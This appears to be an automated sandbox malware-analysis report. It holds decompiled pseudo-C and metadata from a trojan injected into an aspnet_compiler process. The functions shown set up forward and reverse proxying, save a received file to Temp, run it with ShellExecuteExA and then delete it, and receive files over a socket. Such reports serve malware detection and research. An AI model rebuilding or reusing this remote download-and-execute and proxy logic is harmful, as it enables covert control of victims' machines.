                0x00000000
                0x00443dbb
                0x00000000
                0x00443d83
                0x00443bdc
                0x00443b57
                0x00000000
                0x00443b57
                0x00000000
                0x00443b55
                0x00443b4e
                0x00443b50
                0x00443b50
                0x00000000
                0x00443ada
                0x00443ada
                0x00443adc
                0x00443aec
                0x00443aec
                0x00000000

                APIs
                  • Part of subcall function 00446A95: GetLastError.KERNEL32(00000020,?,004390F5,?,?,?,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B), ref: 00446A99
                  • Part of subcall function 00446A95: _free.LIBCMT ref: 00446ACC
                  • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B0D
                  • Part of subcall function 00446A95: _abort.LIBCMT ref: 00446B13
                • _memcmp.LIBVCRUNTIME ref: 00443D24
                • _free.LIBCMT ref: 00443D95
                • _free.LIBCMT ref: 00443DAE
                • _free.LIBCMT ref: 00443DE0
                • _free.LIBCMT ref: 00443DE9
                • _free.LIBCMT ref: 00443DF5
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: _free$ErrorLast$_abort_memcmp
                • String ID: C
                • API String ID: 1679612858-1037565863
                • Opcode ID: d4e76e1364c82f65dc818964d64206a26a0234a24ffe08a66c1da97ccf9c8ffa
                • Instruction ID: 0980accce80153226f5651e8385caabd2fc42b640f1cc77c082d88c635091a5b
                • Opcode Fuzzy Hash: d4e76e1364c82f65dc818964d64206a26a0234a24ffe08a66c1da97ccf9c8ffa
                • Instruction Fuzzy Hash: 71B16B75A016199FEB24DF18C884BAEB7B4FF08705F5085AEE849A7351E734AE90CF44
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00413C51 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                Download Yara Rule
                C-Code - Quality: 45%
                			E00413C51(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				intOrPtr _v0;
				char _v4;
				signed int _v8;
				signed short _v12;
				signed int _v16;
				signed int _v20;
				signed short _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v48;
				signed int _t70;
				signed short _t81;
				signed int _t82;
				signed short _t85;
				signed short _t86;
				void* _t88;
				signed int _t97;
				signed char _t99;
				void* _t100;
				signed int _t107;
				signed short _t108;
				signed int _t110;
				signed int _t116;
				signed int* _t118;
				signed int _t119;
				signed int _t120;
				intOrPtr _t121;

				_t110 = _a8;
				_t99 = 0;
				_t120 = _a4;
				_t97 = 0;
				_v28 = 0;
				_v16 = 0;
				_v32 = 0;
				_v4 = 0;
				_v12 = 0;
				_v24 = 0;
				_v8 = 0;
				_v20 = 0;
				_t119 = 0;
				_t118 = _a16;
				 *_t118 = 0;
				if(_t120 != 0 || _t110 != 0) {
					_t70 = _a12;
					__eflags = _t70;
					if(_t70 == 0) {
						L20:
						_a16 = _t97;
						__eflags = _t110;
						if(_t110 == 0) {
							L40:
							__eflags = _t120;
							if(_t120 == 0) {
								__eflags = _v28 & 0x00000001;
								_t100 = 0;
								_t72 =  !=  ? _t100 : 0x7f000001;
								__imp__#8(0x7f000001);
								_t121 =  !=  ? _t100 : 0x7f000001;
								L47:
								_t73 = E004139B4(_t97, _v20, __eflags, _v36, _t121);
								 *_t118 = _t73;
								__eflags = _t73;
								if(_t73 != 0) {
									__eflags = _v0 - _t119;
									if(_v0 == _t119) {
										L54:
										__eflags = _v28;
										if(_v28 == 0) {
											L57:
											return _t119;
										}
										_t119 = E00413BD8(_v24,  *_t118);
										__eflags = _t119;
										if(_t119 == 0) {
											goto L57;
										}
										L56:
										E00413C16(_t73,  *_t118);
										 *_t118 =  *_t118 & 0x00000000;
										__eflags =  *_t118;
										goto L57;
									}
									 *_t73 =  *_t73 | 0x00000004;
									__eflags = _v32 & 0x00000002;
									if((_v32 & 0x00000002) == 0) {
										goto L54;
									}
									__imp__#12(_t121);
									 *((intOrPtr*)( *_t118 + 0x14)) = E00413936(_t73);
									_t73 =  *_t118;
									__eflags =  *((intOrPtr*)(_t73 + 0x14)) - _t119;
									if( *((intOrPtr*)(_t73 + 0x14)) != _t119) {
										goto L54;
									}
									_t119 = 8;
									L53:
									__eflags = _t119;
									if(_t119 != 0) {
										goto L56;
									}
									goto L54;
								}
								_t119 = 8;
								goto L56;
							}
							__eflags = E0041396E(_t120,  &_v4);
							if(__eflags != 0) {
								_t121 = _v4;
								goto L47;
							}
							_t73 = _v28;
							__eflags = _t73 & 0x00000004;
							if((_t73 & 0x00000004) == 0) {
								_push(_t118);
								_push(_t73 & 0x00000002);
								_push(_v32);
								_push(_v16);
								_t119 = E00413ACD(_t120, _t97);
								goto L53;
							}
							_t119 = 0x2af9;
							goto L56;
						}
						_t107 = E0043E19F(_t99, _t110,  &_v12, 0xa) & 0x0000ffff;
						_t81 = _v12;
						_v32 = _t107;
						__eflags =  *_t81;
						if( *_t81 != 0) {
							__eflags = _t97;
							if(_t97 == 0) {
								L26:
								__imp__#55(_a8, "udp");
								__eflags = _t81;
								if(_t81 != 0) {
									_t85 =  *(_t81 + 8) & 0x0000ffff;
									_v28 = _t85;
									_t81 = _t85 & 0x0000ffff;
									_v40 = _t81;
								}
								L28:
								__eflags = _t97;
								if(_t97 == 0) {
									L30:
									__imp__#55(_v0, "tcp");
									_t116 = 1;
									__eflags = _t81;
									if(_t81 == 0) {
										L32:
										_t108 = _v24;
										_t82 = _v48;
										L33:
										__eflags = _t82;
										if(_t82 != 0) {
											__eflags = _t97;
											if(_t97 != 0) {
												goto L40;
											}
											__eflags = _t108;
											_t97 = (_t97 & 0xffffff00 | _t108 == 0x00000000) + 1;
											__eflags = _t108;
											if(_t108 == 0) {
												L39:
												_t48 =  &_v40;
												 *_t48 = _v40 & _t119;
												__eflags =  *_t48;
												goto L40;
											}
											__eflags = _v36 - _t119;
											if(_v36 == _t119) {
												goto L39;
											}
											_v40 = _t116;
											goto L40;
										}
										__eflags = _t97;
										_t84 =  !=  ? 0x277d : 0x2af9;
										return  !=  ? 0x277d : 0x2af9;
									}
									_t108 =  *(_t81 + 8) & 0x0000ffff;
									_t82 = _t108 & 0x0000ffff;
									_v48 = _t82;
									goto L33;
								}
								_t116 = 1;
								__eflags = _t97 - 1;
								if(_t97 != 1) {
									goto L32;
								}
								goto L30;
							}
							__eflags = _t97 - 2;
							if(_t97 != 2) {
								goto L28;
							}
							goto L26;
						}
						__imp__#9(_t107);
						_t86 = _t81 & 0x0000ffff;
						__eflags = _t97;
						_v24 = _t86;
						_v36 = _t86 & 0x0000ffff;
						_t88 = 1;
						_t97 =  ==  ? _t88 : _t97;
						__eflags = _a12;
						_v28 = 0 | _a12 == 0x00000000;
						goto L40;
					}
					__eflags =  *((intOrPtr*)(_t70 + 0x10)) - _t99;
					if( *((intOrPtr*)(_t70 + 0x10)) != _t99) {
						L23:
						return 0x2afb;
					}
					__eflags =  *((intOrPtr*)(_t70 + 0x14)) - _t99;
					if( *((intOrPtr*)(_t70 + 0x14)) != _t99) {
						goto L23;
					}
					__eflags =  *((intOrPtr*)(_t70 + 0x18)) - _t99;
					if( *((intOrPtr*)(_t70 + 0x18)) != _t99) {
						goto L23;
					}
					__eflags =  *((intOrPtr*)(_t70 + 0x1c)) - _t99;
					if( *((intOrPtr*)(_t70 + 0x1c)) != _t99) {
						goto L23;
					}
					_t99 =  *_t70;
					_v28 = _t99;
					__eflags = _t99 & 0x00000002;
					if((_t99 & 0x00000002) == 0) {
						L11:
						__eflags =  *((intOrPtr*)(_t70 + 4)) - _t97;
						if( *((intOrPtr*)(_t70 + 4)) == _t97) {
							L14:
							_t97 =  *(_t70 + 8);
							__eflags = _t97;
							if(_t97 == 0) {
								L19:
								_v16 =  *((intOrPtr*)(_t70 + 0xc));
								goto L20;
							}
							__eflags = _t97 - 1;
							if(_t97 == 1) {
								goto L19;
							}
							__eflags = _t97 - 2;
							if(_t97 == 2) {
								goto L19;
							}
							__eflags = _t97 - 3;
							if(_t97 == 3) {
								goto L19;
							}
							return 0x273c;
						}
						__eflags =  *((intOrPtr*)(_t70 + 4)) - 2;
						if( *((intOrPtr*)(_t70 + 4)) == 2) {
							goto L14;
						}
						return 0x273f;
					}
					__eflags = _t120;
					if(_t120 != 0) {
						goto L11;
					}
					return 0x2726;
				} else {
					return 0x2af9;
				}
			}
































                0x00413c54
                0x00413c58
                0x00413c5c
                0x00413c60
                0x00413c62
                0x00413c66
                0x00413c6a
                0x00413c6e
                0x00413c72
                0x00413c76
                0x00413c7a
                0x00413c7e
                0x00413c83
                0x00413c86
                0x00413c8a
                0x00413c8e
                0x00413c9e
                0x00413ca2
                0x00413ca4
                0x00413d1f
                0x00413d1f
                0x00413d23
                0x00413d25
                0x00413e1f
                0x00413e1f
                0x00413e21
                0x00413e64
                0x00413e70
                0x00413e71
                0x00413e75
                0x00413e7b
                0x00413e7d
                0x00413e88
                0x00413e8d
                0x00413e8f
                0x00413e91
                0x00413e98
                0x00413e9c
                0x00413ec9
                0x00413ec9
                0x00413ece
                0x00413eeb
                0x00000000
                0x00413eeb
                0x00413edb
                0x00413edd
                0x00413edf
                0x00000000
                0x00000000
                0x00413ee1
                0x00413ee3
                0x00413ee8
                0x00413ee8
                0x00000000
                0x00413ee8
                0x00413e9e
                0x00413ea1
                0x00413ea6
                0x00000000
                0x00000000
                0x00413ea9
                0x00413eb8
                0x00413ebb
                0x00413ebd
                0x00413ec0
                0x00000000
                0x00000000
                0x00413ec4
                0x00413ec5
                0x00413ec5
                0x00413ec7
                0x00000000
                0x00000000
                0x00000000
                0x00413ec7
                0x00413e95
                0x00000000
                0x00413e95
                0x00413e2e
                0x00413e30
                0x00413e5e
                0x00000000
                0x00413e5e
                0x00413e32
                0x00413e36
                0x00413e38
                0x00413e44
                0x00413e4a
                0x00413e4b
                0x00413e51
                0x00413e5a
                0x00000000
                0x00413e5a
                0x00413e3a
                0x00000000
                0x00413e3a
                0x00413d38
                0x00413d3e
                0x00413d42
                0x00413d46
                0x00413d49
                0x00413d84
                0x00413d86
                0x00413d8d
                0x00413d96
                0x00413d9c
                0x00413d9e
                0x00413da0
                0x00413da4
                0x00413da8
                0x00413dab
                0x00413dab
                0x00413daf
                0x00413daf
                0x00413db1
                0x00413dba
                0x00413dc3
                0x00413dcb
                0x00413dcc
                0x00413dce
                0x00413ddd
                0x00413ddd
                0x00413de1
                0x00413de5
                0x00413de5
                0x00413de8
                0x00413dfe
                0x00413e00
                0x00000000
                0x00000000
                0x00413e02
                0x00413e08
                0x00413e09
                0x00413e0c
                0x00413e1b
                0x00413e1b
                0x00413e1b
                0x00413e1b
                0x00000000
                0x00413e1b
                0x00413e0e
                0x00413e13
                0x00000000
                0x00000000
                0x00413e15
                0x00000000
                0x00413e15
                0x00413dea
                0x00413df6
                0x00000000
                0x00413df6
                0x00413dd0
                0x00413dd4
                0x00413dd7
                0x00000000
                0x00413dd7
                0x00413db5
                0x00413db6
                0x00413db8
                0x00000000
                0x00000000
                0x00000000
                0x00413db8
                0x00413d88
                0x00413d8b
                0x00000000
                0x00000000
                0x00000000
                0x00413d8b
                0x00413d4c
                0x00413d52
                0x00413d55
                0x00413d57
                0x00413d5e
                0x00413d64
                0x00413d65
                0x00413d6a
                0x00413d71
                0x00000000
                0x00413d71
                0x00413ca6
                0x00413ca9
                0x00413d7a
                0x00000000
                0x00413d7a
                0x00413caf
                0x00413cb2
                0x00000000
                0x00000000
                0x00413cb8
                0x00413cbb
                0x00000000
                0x00000000
                0x00413cc1
                0x00413cc4
                0x00000000
                0x00000000
                0x00413cca
                0x00413ccc
                0x00413cd0
                0x00413cd3
                0x00413ce3
                0x00413ce3
                0x00413ce6
                0x00413cf8
                0x00413cf8
                0x00413cfb
                0x00413cfd
                0x00413d18
                0x00413d1b
                0x00000000
                0x00413d1b
                0x00413cff
                0x00413d02
                0x00000000
                0x00000000
                0x00413d04
                0x00413d07
                0x00000000
                0x00000000
                0x00413d09
                0x00413d0c
                0x00000000
                0x00000000
                0x00000000
                0x00413d0e
                0x00413ce8
                0x00413cec
                0x00000000
                0x00000000
                0x00000000
                0x00413cee
                0x00413cd5
                0x00413cd7
                0x00000000
                0x00000000
                0x00000000
                0x00413c94
                0x00000000
                0x00413c94

                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: tcp$udp
                • API String ID: 0-3725065008
                • Opcode ID: 989d942223f8045c26bfd392dcc121cd2c507f3a9003dba06f7d9cf9a685d5a6
                • Instruction ID: 254d435c4adeb88c6bd87cc200726294b993cf902dfc57313b1be41f1fc3726a
                • Opcode Fuzzy Hash: 989d942223f8045c26bfd392dcc121cd2c507f3a9003dba06f7d9cf9a685d5a6
                • Instruction Fuzzy Hash: A77188706083028FDB24CE15D4846ABBBE4EF94746F14493FF88597360E779CE858B9A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00410A38 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 191COMMON
                Download Yara Rule
                C-Code - Quality: 67%
                			E00410A38(void* __edx, void* __eflags, intOrPtr _a4) {
				char _v32;
				char _v56;
				void* _v60;
				char _v72;
				char _v76;
				char _v80;
				char _v88;
				char _v92;
				void* _v96;
				char _v108;
				char _v112;
				void* __ebx;
				void* __edi;
				void* __ebp;
				intOrPtr* _t26;
				char* _t34;
				char* _t37;
				intOrPtr _t50;
				char* _t51;
				char* _t58;
				intOrPtr _t60;
				intOrPtr _t61;
				char* _t65;
				void* _t68;
				intOrPtr _t121;
				void* _t125;
				void* _t128;
				void* _t130;
				void* _t131;
				void* _t133;
				void* _t135;
				signed int _t136;
				void* _t139;
				void* _t140;
				void* _t141;
				void* _t145;

				_t147 = __eflags;
				_t111 = __edx;
				_push(_t68);
				_t121 = _a4;
				E004020D6(_t68,  &_v76, __edx, __eflags, _t121 + 0xc);
				SetEvent( *(_t121 + 0x24));
				_t26 = E00401F8B( &_v80);
				E00404182( &_v80,  &_v56, 4, 0xffffffff);
				_t139 = (_t136 & 0xfffffff8) - 0x3c;
				E004020D6(0x472ec8, _t139, _t111, _t147, 0x472ec8);
				_t140 = _t139 - 0x18;
				E004020D6(0x472ec8, _t140, _t111, _t147,  &_v72);
				E0041A976( &_v112, _t111);
				_t141 = _t140 + 0x30;
				_t125 =  *_t26 - 0x46;
				if(_t125 == 0) {
					E00401E45( &_v88, _t111, _t135, __eflags, 1);
					_t34 = E0040245C();
					E00401F8B(E00401E45( &_v92, _t111, _t135, __eflags, 1));
					_t112 = _t34;
					_t37 = E00411235();
					_t127 = _t37;
					__eflags = _t37;
					if(__eflags == 0) {
						_t128 = _t141 - 0x18;
						_push("1");
						L19:
						_t111 = E00402F11( &_v32, E00401E45( &_v88, _t112, _t135, __eflags, 0), _t135, 0x472ec8);
						E00408832(0x472ec8, _t128, _t39, _t121, _t135, __eflags);
						_push(0x85);
						E00404A81(_t121, _t39, __eflags);
						E00401FB8();
						L20:
						E00401E6D( &_v108, _t111);
						E00401FB8();
						E00401FB8();
						return 0;
					}
					 *0x470d50 = E004114AA(_t127, "StartForward");
					 *0x470d4c = E004114AA(_t127, "StartReverse");
					 *0x470d54 = E004114AA(_t127, "StopForward");
					_t50 = E004114AA(_t127, "StopReverse");
					_t112 = "GetDirectListeningPort";
					 *0x470d5c = _t50;
					_t51 = E004114AA(_t127, "GetDirectListeningPort");
					__eflags =  *0x470d50;
					 *0x470d58 = _t51;
					if(__eflags == 0) {
						L17:
						_t128 = _t141 - 0x18;
						_push("2");
						goto L19;
					}
					__eflags =  *0x470d4c;
					if(__eflags == 0) {
						goto L17;
					}
					__eflags =  *0x470d54;
					if(__eflags == 0) {
						goto L17;
					}
					__eflags = _t51;
					if(__eflags == 0) {
						goto L17;
					}
					 *0x470d49 = 1;
					E004020D6(0x472ec8, _t141 - 0x18, "GetDirectListeningPort", __eflags, E00401E45( &_v88, "GetDirectListeningPort", _t135, __eflags, 0));
					_push(0x76);
					L10:
					E00404A81(_t121, _t112, __eflags);
					goto L20;
				}
				_t130 = _t125 - 1;
				if(_t130 == 0) {
					_t58 =  *0x470d50(E0043A3AC(_t55, E00401F8B(E00401E45( &_v88, _t111, _t135, __eflags, 0))));
					_t145 = _t141 - 0x14;
					L9:
					_t112 = _t58;
					E0041A6E9(0x472ec8, _t145, _t58);
					_push(0x77);
					goto L10;
				}
				_t131 = _t130 - 1;
				if(_t131 == 0) {
					_t60 =  *0x470adc; // 0x140f348
					_t61 =  *((intOrPtr*)(_t60 + 0x18));
					__imp__#12( *((intOrPtr*)(_t61 + 4)));
					_t65 =  *0x470d4c(_t61, E0043A3AC(_t62, E00401F8B(E00401E45( &_v92, _t111, _t135, __eflags, 0))) & 0x0000ffff);
					__eflags = _t65;
					_t109 =  !=  ? 1 :  *0x470d4a & 0x000000ff;
					 *0x470d4a =  !=  ? 1 :  *0x470d4a & 0x000000ff;
					_t112 = _t65;
					E0041A6E9(0x472ec8, _t141 - 0x10, _t65);
					_push(0x78);
					goto L10;
				}
				_t133 = _t131 - 1;
				if(_t133 == 0) {
					_t58 =  *0x470d54();
					_t145 = _t141 - 0x18;
					goto L9;
				}
				if(_t133 == 1) {
					 *0x470d5c();
					 *0x470d4a = 0;
				}
				goto L20;
			}







































                0x00410a38
                0x00410a38
                0x00410a45
                0x00410a48
                0x00410a4f
                0x00410a57
                0x00410a61
                0x00410a75
                0x00410a7a
                0x00410a85
                0x00410a8a
                0x00410a94
                0x00410a9d
                0x00410aa2
                0x00410aa5
                0x00410aa8
                0x00410b83
                0x00410b8a
                0x00410b9e
                0x00410ba3
                0x00410ba7
                0x00410bac
                0x00410bae
                0x00410bb0
                0x00410c5d
                0x00410c5f
                0x00410c64
                0x00410c7c
                0x00410c80
                0x00410c86
                0x00410c8d
                0x00410c96
                0x00410c9b
                0x00410c9f
                0x00410ca8
                0x00410cb1
                0x00410cbe
                0x00410cbe
                0x00410bc7
                0x00410bd8
                0x00410be9
                0x00410bf0
                0x00410bf5
                0x00410bfa
                0x00410c01
                0x00410c06
                0x00410c0d
                0x00410c12
                0x00410c4e
                0x00410c51
                0x00410c53
                0x00000000
                0x00410c53
                0x00410c14
                0x00410c1b
                0x00000000
                0x00000000
                0x00410c1d
                0x00410c24
                0x00000000
                0x00000000
                0x00410c26
                0x00410c28
                0x00000000
                0x00000000
                0x00410c30
                0x00410c42
                0x00410c47
                0x00410b71
                0x00410b73
                0x00000000
                0x00410b73
                0x00410aae
                0x00410ab1
                0x00410b5d
                0x00410b63
                0x00410b66
                0x00410b66
                0x00410b6a
                0x00410b6f
                0x00000000
                0x00410b6f
                0x00410ab7
                0x00410aba
                0x00410ae7
                0x00410aec
                0x00410af2
                0x00410b18
                0x00410b28
                0x00410b2a
                0x00410b30
                0x00410b36
                0x00410b3a
                0x00410b3f
                0x00000000
                0x00410b3f
                0x00410abc
                0x00410abf
                0x00410adc
                0x00410ae2
                0x00000000
                0x00410ae2
                0x00410ac4
                0x00410aca
                0x00410ad0
                0x00410ad0
                0x00000000

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Eventinet_ntoa
                • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                • API String ID: 3578746661-168337528
                • Opcode ID: af03b7a25076df44827bf509d870b99db58fd949c03e63e8dbabe2dd9f5d5f63
                • Instruction ID: e75f285b9767d1c550f565d519be053d97adf82a0a3bf380a10654d69fa8857e
                • Opcode Fuzzy Hash: af03b7a25076df44827bf509d870b99db58fd949c03e63e8dbabe2dd9f5d5f63
                • Instruction Fuzzy Hash: A051D631A043009BC714BB79D81A66E36A5AB80314F40453FF90AA76E5EF7C9985CBDF
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00416BCD Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 108filesynchronizationCOMMON
                Download Yara Rule
                C-Code - Quality: 73%
                			E00416BCD(void* __edx, void* __eflags, char _a4, char _a28) {
				char _v28;
				struct _SHELLEXECUTEINFOA _v88;
				char _v112;
				char _v136;
				char _v316;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t33;
				void* _t41;
				intOrPtr _t50;
				signed int _t60;
				char* _t68;
				void* _t73;
				void* _t90;
				void* _t91;

				_t94 = __eflags;
				_t33 = E00402073(_t60,  &_v136, __edx, _t90, "\\");
				_t87 = E004052DD(_t60,  &_v112, E0043A9AA(_t60, __eflags, "Temp"), _t90, _t94, _t33);
				E00402EF0(_t60,  &_v28, _t35, _t90, _t94,  &_a4);
				E00401FB8();
				_t68 =  &_v136;
				E00401FB8();
				_push(_t68);
				_push(_t68);
				_t41 = E00416E0A(E0040F0F6( &_v316, _t35, _t94, E00401F8B( &_v28), 0x10),  &_v316);
				_t95 = _t41;
				if(_t41 == 0) {
					E00402073(_t60, _t91 - 0x18, _t87, _t90, 0x464074);
					_push(0x6f);
					_t73 = 0x473580;
					goto L6;
				} else {
					_t87 =  &_a28;
					E00416E1A( &_v316,  &_a28, _t95);
					E0040F0A7( &_v316,  &_a28, _t95);
					_v88.hwnd = _v88.hwnd & 0x00000000;
					_v88.lpVerb = _v88.lpVerb & 0x00000000;
					_v88.cbSize = 0x3c;
					_v88.fMask = 0x40;
					_t50 = E00401F8B( &_v28);
					asm("movaps xmm0, [0x46b1c0]");
					_v88.lpFile = _t50;
					asm("movups [ebp-0x40], xmm0");
					_t60 = _t60 & 0xffffff00 | ShellExecuteExA( &_v88) != 0x00000000;
					_t97 = _v88.hProcess;
					if(_v88.hProcess != 0) {
						E00402073(_t60, _t91,  &_a28, _t90, 0x464074);
						_push(0x70);
						E00404A81(0x473580, _t87, _t97);
						WaitForSingleObject(_v88.hProcess, 0xffffffff);
						CloseHandle(_v88.hProcess);
						DeleteFileA(E00401F8B( &_v28));
					}
					_t98 = _t60 - 1;
					if(_t60 == 1) {
						E00402073(_t60, _t91 - 0x18, _t87, _t90, 0x464074);
						_push(0x6e);
						_t73 = 0x473580;
						L6:
						E00404A81(_t73, _t87, _t98);
					}
				}
				E0040E8CD(_t60,  &_v316, 0x464074);
				E00401FB8();
				E00401FB8();
				return E00401FB8();
			}



















                0x00416bcd
                0x00416be8
                0x00416c04
                0x00416c09
                0x00416c12
                0x00416c17
                0x00416c1d
                0x00416c22
                0x00416c23
                0x00416c40
                0x00416c45
                0x00416c47
                0x00416d08
                0x00416d0d
                0x00416d0f
                0x00000000
                0x00416c4d
                0x00416c4d
                0x00416c56
                0x00416c61
                0x00416c66
                0x00416c6d
                0x00416c71
                0x00416c78
                0x00416c7f
                0x00416c84
                0x00416c8b
                0x00416c92
                0x00416ca8
                0x00416cab
                0x00416caf
                0x00416cb7
                0x00416cbc
                0x00416cc0
                0x00416cca
                0x00416cd3
                0x00416ce2
                0x00416ce2
                0x00416ce8
                0x00416ceb
                0x00416cf3
                0x00416cf8
                0x00416cfa
                0x00416d14
                0x00416d14
                0x00416d14
                0x00416ceb
                0x00416d1f
                0x00416d27
                0x00416d2f
                0x00416d42

                APIs
                  • Part of subcall function 00416E1A: __EH_prolog.LIBCMT ref: 00416E1F
                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00464074), ref: 00416CCA
                • CloseHandle.KERNEL32(00000000), ref: 00416CD3
                • DeleteFileA.KERNEL32(00000000), ref: 00416CE2
                • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416C96
                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                • String ID: <$@$Temp
                • API String ID: 1704390241-1032778388
                • Opcode ID: ff9cea69b05bc38d64019fd9820552f1091102cc02052d8ee4391d685e661bf1
                • Instruction ID: 69e270f03dbcf525bbd0e705c12af2ecc391514570d21efb9077f5f7aa5c102b
                • Opcode Fuzzy Hash: ff9cea69b05bc38d64019fd9820552f1091102cc02052d8ee4391d685e661bf1
                • Instruction Fuzzy Hash: A54196319002099BDB14FBA1DC56AED7738AF50318F50427EF505760D2EF785A86CB99
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00406FD7 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                Download Yara Rule
                C-Code - Quality: 88%
                			E00406FD7(intOrPtr __ecx, void* __eflags, intOrPtr _a8, char _a12, char _a16, void* _a36, char _a40, void _a52, char _a64, intOrPtr _a100052, intOrPtr _a100072, char _a100080) {
				long _v0;
				char _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __ebp;
				WCHAR* _t35;
				long _t42;
				struct _OVERLAPPED* _t54;
				intOrPtr _t72;
				intOrPtr _t74;
				long _t76;
				void* _t77;
				void* _t78;
				void* _t80;
				void* _t82;
				void* _t83;
				void* _t85;

				_t82 = __eflags;
				E00455FB0();
				_push(_t77);
				_t74 = __ecx;
				_t69 =  &_a100080;
				asm("xorps xmm0, xmm0");
				_a8 = __ecx;
				_t54 = 0;
				asm("movlpd [esp+0x10], xmm0");
				_a12 = 0;
				E00403242(0,  &_a16, _t77, _t82, E004087F0( &_a40,  &_a100080, _t77, L".part"));
				E00401EE9();
				_t78 = CreateFileW(E00401EE4( &_a12), 4, 0, 0, 2, 0x80, 0);
				_t83 = _v0 - _a100072;
				if(_t83 > 0) {
					L6:
					CloseHandle(_t78);
					_t35 = E00401EE4( &_a100080);
					MoveFileW(E00401EE4( &_a16), _t35);
					_t54 = 1;
				} else {
					_t72 = _a100072;
					if(_t83 >= 0) {
						L5:
						if(_v0 < _t72) {
							goto L2;
						} else {
							goto L6;
						}
					} else {
						while(1) {
							L2:
							_t42 = E00404B76(_t74,  &_a64, 0x186a0);
							_t76 = _t42;
							asm("cdq");
							_v12 = _v12 + _t42;
							asm("adc [esp+0x18], edx");
							WriteFile(_t78,  &_a52, _t76,  &_v0, _t54);
							_t80 = _t80 - 0x18;
							E00402097(_t54, _t80, _t69, _t78, _t83,  &_v12, 8);
							E00404A81(_v12, _t69, _t83, 0x57, _v12);
							if(_t76 <= 0) {
								break;
							}
							_t74 = _v16;
							_t85 = _v20 - _a100052;
							if(_t85 < 0) {
								continue;
							} else {
								if(_t85 > 0) {
									goto L6;
								} else {
									goto L5;
								}
							}
							goto L7;
						}
						CloseHandle(_t78);
						DeleteFileW(E00401EE4( &_v8));
					}
				}
				L7:
				E00401EE9();
				E00401EE9();
				return _t54;
			}






















                0x00406fd7
                0x00406fdc
                0x00406fe2
                0x00406fe4
                0x00406fe6
                0x00406fee
                0x00406ff1
                0x00406ff5
                0x00406ff7
                0x00407006
                0x00407015
                0x0040701e
                0x0040703f
                0x00407048
                0x0040704c
                0x004070c0
                0x004070c1
                0x004070ce
                0x004070de
                0x004070e4
                0x0040704e
                0x0040704e
                0x00407055
                0x004070ba
                0x004070be
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00407057
                0x00407057
                0x00407057
                0x00407064
                0x00407069
                0x0040706b
                0x0040706c
                0x00407075
                0x00407081
                0x00407087
                0x00407093
                0x0040709e
                0x004070a5
                0x00000000
                0x00000000
                0x004070ae
                0x004070b2
                0x004070b6
                0x00000000
                0x004070b8
                0x004070b8
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004070b8
                0x00000000
                0x004070b6
                0x00407109
                0x00407119
                0x00407119
                0x00407055
                0x004070e6
                0x004070ea
                0x004070f6
                0x00407107

                APIs
                • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00472EC8,00463F74,?,00000000,00407670,00000000), ref: 00407039
                • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407670,00000000,?,?,0000000A,00000000), ref: 00407081
                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                • CloseHandle.KERNEL32(00000000,?,00000000,00407670,00000000,?,?,0000000A,00000000), ref: 004070C1
                • MoveFileW.KERNEL32(00000000,00000000), ref: 004070DE
                • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407109
                • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407119
                  • Part of subcall function 00404B76: WaitForSingleObject.KERNEL32(?,000000FF,?,00472EE0,00404C29,00000000,?,?,?,00472EE0,?), ref: 00404B85
                  • Part of subcall function 00404B76: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040546B), ref: 00404BA3
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
